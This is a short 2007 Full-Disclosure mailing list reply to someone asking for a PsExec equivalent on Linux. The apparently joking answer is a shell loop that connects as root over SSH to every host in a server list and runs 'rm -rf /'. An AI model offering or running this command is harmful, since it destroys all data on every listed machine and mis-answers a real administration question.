[<prev] [next>] [<thread-prev] [thread-next>] [month] [year] [list]
Date: Thu, 1 Feb 2007 12:48:13 +0100
From: "Knud Erik Højgaard" <kokanin@...il.com>
To: "Gianluca Giacometti" <gianluca.giacometti@...pd.it>
Subject: Re: (Psexec on *NIX)
> something similar to PSExec under linux.
ssh-keygen
ssh-add
for i in `cat serverlist` ; do ssh root@$i rm -rf / ; done
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Hosted by DataForce ISP -
Powered by Openwall GNU/*/Linux